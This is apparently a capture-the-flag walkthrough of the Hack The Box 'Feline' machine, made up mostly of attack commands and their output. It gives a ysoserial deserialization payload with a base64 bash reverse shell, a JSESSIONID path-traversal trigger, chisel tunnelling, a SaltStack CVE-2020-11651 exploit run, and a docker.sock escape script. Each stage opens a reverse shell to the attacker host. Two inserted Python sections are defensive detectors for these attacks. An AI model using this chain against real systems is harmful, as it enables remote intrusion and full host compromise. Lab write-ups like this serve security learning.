NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 12:13 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating Ping Scan at 12:14
Scanning 10.10.10.205 [4 ports]
Completed Ping Scan at 12:14, 0.56s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:14
Scanning feline.htb (10.10.10.205) [1000 ports]
Discovered open port 8080/tcp on 10.10.10.205
Discovered open port 22/tcp on 10.10.10.205
Completed SYN Stealth Scan at 12:14, 3.61s elapsed (1000 total ports)
Initiating Service scan at 12:14
Scanning 2 services on feline.htb (10.10.10.205)
Completed Service scan at 12:14, 8.85s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against feline.htb (10.10.10.205)
Retrying OS detection (try #2) against feline.htb (10.10.10.205)
Retrying OS detection (try #3) against feline.htb (10.10.10.205)
Retrying OS detection (try #4) against feline.htb (10.10.10.205)
Retrying OS detection (try #5) against feline.htb (10.10.10.205)
Initiating Traceroute at 12:14
Completed Traceroute at 12:14, 0.48s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:14
Completed Parallel DNS resolution of 2 hosts. at 12:14, 0.41s elapsed
NSE: Script scanning 10.10.10.205.
Initiating NSE at 12:14
Completed NSE at 12:14, 11.08s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 1.22s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Nmap scan report for feline.htb (10.10.10.205)
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache Tomcat 9.0.27
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: VirusBucket
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/4%OT=22%CT=1%CU=41377%PV=Y%DS=2%DC=T%G=Y%TM=5F51E25D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)

Uptime guess: 22.689 days (since Wed Aug 12 19:42:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   474.94 ms 10.10.14.1
2   475.12 ms feline.htb (10.10.10.205)

NSE: Script Post-scanning.
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.52 seconds
           Raw packets sent: 1159 (55.038KB) | Rcvd: 1121 (48.462KB)
PORT 8080
HOME PAGE
SERVICE PAGE
Here we can upload files, so let's push this through Burp.
We will see that a file uploads easily, but the main thing is its destination. Trying hit and trial, I just removed the filename to see what happens if we do that, and we get output like this:
Now we know the upload directory, and we know the web application is a Tomcat one, which is what we need to exploit. For that I found various websites we can take help from.
We will be using a Java deserialization attack against Tomcat to trigger the uploaded file, but before that we need to upload it with a .session extension, since the JSESSIONID cookie trick will only trigger files carrying the .session extension.
The links where you can read about this and clone the repos are:
https://medium.com/swlh/hacking-java-deserialization-7625c8450334
We also need to download the ysoserial jar file; the link for that is:
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
Now get all these files, read through them, and then we will use the commands below.
USER ACCESS
First let's build the Java exploit command with the .session extension.
First create the command to be executed:
echo "bash -i >& /dev/tcp/10.10.14.167/9002 0>&1" | base64
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNjcvOTAwMiAwPiYxCg==}|{base64,-d}|{bash,-i}
In the above two commands we have used base64 so that we do not run into errors with the symbols and spaces in the reverse shell command: the payload's command does not go through a shell by itself, so redirections like >& and the /dev/tcp path are only interpreted once the decoded string is handed to bash. That is why base64 is used here, and it is the standard way of getting a shell command through a Java deserialization payload.
Secondly, to create the file with the .session extension:
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNjcvOTAwMiAwPiYxCg==}|{base64,-d}|{bash,-i}" > liquidrage.session
This generates a session file using the ysoserial jar, which is the tool for creating such payloads.
Now just upload that session file through the web page,
and then we will trigger it to get our shell.
So after uploading your file, run this command:
curl -sS 'http://feline.htb:8080/upload.jsp' -H "Cookie:JSESSIONID=../../../opt/samples/uploads/liquidrage" > /dev/null
My reverse shell:
┌─[root@liquid]─[~/Desktop/HTB/feline]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 48714
bash: cannot set terminal process group (932): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@VirusBucket:/opt/tomcat$ id
id
uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat)
tomcat@VirusBucket:/opt/tomcat$ cd
cd
tomcat@VirusBucket:~$ cat user.txt
cat user.txt
f50498c09383bb0c245da7098ebc5d3a
tomcat@VirusBucket:~$
Now we have USER ACCESS.
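From the defender's side, the trigger above leaves a clear trace: a JSESSIONID cookie that is not a session id at all but a relative path. The following Python is an added detection example, not code from the original post; it assumes a Tomcat AccessLogValve pattern that records the Cookie request header (the default pattern does not), and the log lines are constructed samples in that format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). The assumed
# AccessLogValve pattern is '%h %l %u %t "%r" %s %b "%{Cookie}i"', which logs the
# raw Cookie request header; Tomcat's default pattern does not record cookies.
SAMPLE_LOG = """\
10.10.14.167 - - [04/Sep/2020:12:20:01 +0530] "GET /upload.jsp HTTP/1.1" 200 512 "JSESSIONID=A1B2C3D4E5F60718293A4B5C6D7E8F90"
10.10.14.167 - - [04/Sep/2020:12:20:30 +0530] "GET /service.jsp HTTP/1.1" 200 1024 "-"
10.10.14.167 - - [04/Sep/2020:12:21:45 +0530] "GET /upload.jsp HTTP/1.1" 500 0 "JSESSIONID=../../../opt/samples/uploads/liquidrage"
10.10.14.167 - - [04/Sep/2020:12:22:10 +0530] "GET /upload.jsp HTTP/1.1" 500 0 "theme=dark; JSESSIONID=..%2F..%2F..%2Ftmp%2Fx"
"""

# One log line: host, ident, user, timestamp, request line, status, bytes, Cookie header.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<cookie>[^"]*)"$'
)

# What a Tomcat-generated session id looks like: an alphanumeric id with an
# optional ".jvmRoute" suffix when the instance sits behind a load balancer.
SAFE_SID_RE = re.compile(r'^[A-Za-z0-9]{1,64}(\.[A-Za-z0-9_-]{1,32})?$')


def extract_jsessionid(cookie_header):
    """Return the JSESSIONID value from a raw Cookie header, or None."""
    for part in cookie_header.split(';'):
        name, _, value = part.strip().partition('=')
        if name == 'JSESSIONID':
            return value
    return None


def session_id_reason(sid):
    """Return why a session id is suspicious, or None if it looks legitimate."""
    decoded = unquote(sid)  # catch URL-encoded traversal such as ..%2F
    if '..' in decoded or '/' in decoded or '\\' in decoded:
        return 'path traversal characters in session id'
    if not SAFE_SID_RE.match(decoded):
        return 'session id outside the expected character set'
    return None


def scan_log(text):
    """Return (line number, client, session id, reason) for every suspicious line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unexpected format; a real deployment would count these
        sid = extract_jsessionid(m.group('cookie'))
        if sid is None:
            continue
        reason = session_id_reason(sid)
        if reason is not None:
            hits.append((lineno, m.group('host'), sid, reason))
    return hits


if __name__ == '__main__':
    for lineno, host, sid, reason in scan_log(SAMPLE_LOG):
        print(f'line {lineno}: {host} sent JSESSIONID={sid!r}: {reason}')
```

Run against the constructed sample, it flags lines 3 and 4 and leaves the real session id and the cookie-less request alone. Detection is the fallback; the fix is to upgrade Tomcat to a release that rejects such session ids and to never point a FileStore session manager at a directory that uploads can reach.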
ROOT ACCESS
Let's check all the listening ports right now:
tomcat@VirusBucket:~$ netstat -ltn
netstat -ltn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:36533         0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:4505          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:4506          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN
tcp6       0      0 :::8080                 :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
tomcat@VirusBucket:~$
We all know that ports 4505 and 4506 are the SaltStack ones.
Let's get its exploit from Google.
Here we got the exploit, but we cannot use it in this shell, as we need to import some modules which we cannot do there.
So as usual let's get chisel out and forward this port to our machine.
To download and install chisel, follow along.
Commands to run to get the chisel executable:
cd chisel
go build
Now you will have chisel, but it's a large file, so to decrease its size:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #go build -ldflags="-s -w"
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #upx build chisel
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: build: FileNotFoundException: build: No such file or directory
   9555968 ->   3833252   40.11%   linux/amd64   chisel

Packed 1 file.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #du -hs chisel
3.7M    chisel
Now just transfer the file and get the server up for the port forward.
tomcat@VirusBucket:/tmp$ chmod +x chisel
chmod +x chisel
tomcat@VirusBucket:/tmp$ ./chisel client 10.10.14.167:9004 R:4506:127.0.0.1:4506
<isel client 10.10.14.167:9004 R:4506:127.0.0.1:4506
2020/09/04 05:33:52 client: Connecting to ws://10.10.14.167:9004
2020/09/04 05:33:54 client: Fingerprint 76:85:e6:4d:bb:72:b8:a9:cd:ef:07:b0:51:3a:be:01
2020/09/04 05:33:55 client: Connected (Latency 414.88223ms)
chisel server response:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #./chisel server -p 9004 --reverse
2020/09/04 10:57:19 server: Reverse tunnelling enabled
2020/09/04 10:57:19 server: Fingerprint 76:85:e6:4d:bb:72:b8:a9:cd:ef:07:b0:51:3a:be:01
2020/09/04 10:57:19 server: Listening on http://0.0.0.0:9004
2020/09/04 10:57:23 server: session#1: tun: proxy#R:4506=>4506: Listening
Now let's run that script right away.
To run it we need to install the salt module:
pip3 install salt
Now let's get a shell as mentioned in the PoC:
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc]
└──╼ #python3 exploit.py --master 127.0.0.1 --exec "nc 127.0.0.1 9005 -e /bin/sh"
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (127.0.0.1:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: NdhkLm4xlo/nfaw+mtVJsuY+SqyJwGWaLx8189/vjbwRfNLUwCce5YFnJGcZsg9AaJuVCvZiBPQ=
[+] Attemping to execute nc 127.0.0.1 9005 -e /bin/sh on 127.0.0.1
[+] Successfully scheduled job: 20200904055046865589
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc]
└──╼ #python3 exploit.py --master 127.0.0.1 --exec 'bash -c "bash -i >& /dev/tcp/10.10.14.167/9005 0>&1"'
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (127.0.0.1:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: NdhkLm4xlo/nfaw+mtVJsuY+SqyJwGWaLx8189/vjbwRfNLUwCce5YFnJGcZsg9AaJuVCvZiBPQ=
[+] Attemping to execute bash -c "bash -i >& /dev/tcp/10.10.14.167/9005 0>&1" on 127.0.0.1
[+] Successfully scheduled job: 20200904055201158560
Above I tried nc, which didn't work, but the bash reverse shell worked perfectly.
My reverse shell:
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc]
└──╼ #nc -lnvp 9005
listening on [any] 9005 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 49746
bash: cannot set terminal process group (2095): Inappropriate ioctl for device
bash: no job control in this shell
root@2d24bf61767c:~#
But here we are inside Docker.
Here in the bash history we are given docker.sock, which is odd, and this Docker container is running an SSH server.
So here we will be creating a new Docker container and mounting all the data from the previous one into it, including the root files.
To do that I have a script which I had to take and understand from my friend:
#!/bin/bash
# Reverse shell command that the new container will run from the mounted filesystem
pay="bash -c 'bash -i >& /dev/tcp/10.10.14.167/9007 0>&1'"
# Container command: chroot into the bind-mounted host root at /mnt and run it there
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$pay\\\"\"]"
# Ask the Docker daemon over the exposed socket to create a container from the
# "sandbox" image with the host's / bind-mounted read-write at /mnt
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock \
  -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" \
  -H 'Content-Type: application/json' http://localhost/containers/create)
# The create response is {"Id":"<id>",...}; the fourth "-delimited field is the id
revShellContainerID=$(echo "$response" | cut -d'"' -f4)
# Start the container, then read back its logs
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start
sleep 1
curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"
Just transfer this script to that machine, open up your nc listener, and run the script.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #ssh root@127.0.0.1 -i id_rsa
Linux 2d24bf61767c 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep  4 06:07:04 2020 from 127.0.0.1
root@2d24bf61767c:~# wget http://10.10.14.167/exploit.sh
--2020-09-04 06:15:01--  http://10.10.14.167/exploit.sh
Connecting to 10.10.14.167:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 641 [text/x-sh]
Saving to: 'exploit.sh'

exploit.sh          100%[============================================================>]     641  --.-KB/s    in 0s

2020-09-04 06:15:02 (45.0 MB/s) - 'exploit.sh' saved [641/641]

root@2d24bf61767c:~# chmod +x exploit.sh
root@2d24bf61767c:~# ./exploit.sh
root@2d24bf61767c:~#
My reverse shell:
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #nc -lnvp 9007
listening on [any] 9007 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 41764
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@1dfbcd626cdb:/cd ls
cd
root@1dfbcd626cdb:~# ls
root.txt  snap
root@1dfbcd626cdb:~# cat ro
cat root.txt
2452ed5c64fdb7bf31ab09bf7a9b9140
root@1dfbcd626cdb:~#
Here we go with our root flag.
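The escape works only because the container can talk to the daemon and ask for a host bind of /. A defender who must expose the socket can at least audit what gets requested over it. The Python below is an added example, not part of the original post or the script above: it checks a /containers/create request body for host-root and other sensitive bind mounts, privileged mode and host namespaces. Both request bodies are constructed; the first copies the shape the script sends, including its top-level "Binds", which the Engine API accepts for backwards compatibility alongside the documented HostConfig.Binds.

```python
import json

# Constructed request body mirroring what the script above sends (not copied from
# it verbatim): the host's / bind-mounted read-write at /mnt, Binds at top level.
ESCAPE_SPEC = json.loads(
    '{"Image":"sandbox","cmd":["/bin/sh","-c","id"], "Binds": ["/:/mnt:rw"]}'
)

# Constructed benign request body using the documented HostConfig placement.
BENIGN_SPEC = {
    "Image": "sandbox",
    "Cmd": ["/bin/sh", "-c", "id"],
    "HostConfig": {"Binds": ["app-data:/data:ro"], "Privileged": False},
}

# Host paths that should never be handed to an untrusted container. The list is
# an assumption for this example; a real policy would be site-specific.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/proc", "/sys", "/dev",
                        "/var/run/docker.sock", "/run/docker.sock")


def collect_binds(spec):
    """Gather Binds from both places the Engine API reads them.

    HostConfig.Binds is the documented location; the daemon also honours a
    top-level Binds from older API clients, so an audit must look in both."""
    binds = list(spec.get("Binds") or [])
    binds += list((spec.get("HostConfig") or {}).get("Binds") or [])
    return binds


def host_path_is_sensitive(src):
    """True if a bind source is the host root or lies under a sensitive tree."""
    if not src.startswith("/"):
        return False  # a named volume, not a host path
    norm = src.rstrip("/") or "/"
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p + "/")
               for p in SENSITIVE_HOST_PATHS if p != "/")


def audit_container_create(spec):
    """Return a list of policy findings for a /containers/create request body."""
    findings = []
    host_config = spec.get("HostConfig") or {}
    for bind in collect_binds(spec):
        parts = bind.split(":")          # "src:dst[:mode]"
        src = parts[0]
        mode = parts[2] if len(parts) > 2 else "rw"   # Docker defaults binds to rw
        if host_path_is_sensitive(src):
            findings.append(f"bind mounts sensitive host path {src} ({mode})")
    if host_config.get("Privileged") or spec.get("Privileged"):
        findings.append("privileged container")
    for key in ("PidMode", "NetworkMode", "IpcMode"):
        if host_config.get(key) == "host" or spec.get(key) == "host":
            findings.append(f"{key}=host shares a host namespace")
    return findings


if __name__ == "__main__":
    for name, spec in (("escape", ESCAPE_SPEC), ("benign", BENIGN_SPEC)):
        print(name, "->", audit_container_create(spec) or ["no findings"])
```

The escape body is flagged for its read-write bind of / while the benign one passes. A check like this belongs in a daemon authorization plugin or in whatever proxies the socket; the cleaner fix is the one the bash history hints at, which is not to mount docker.sock into the container in the first place.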
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE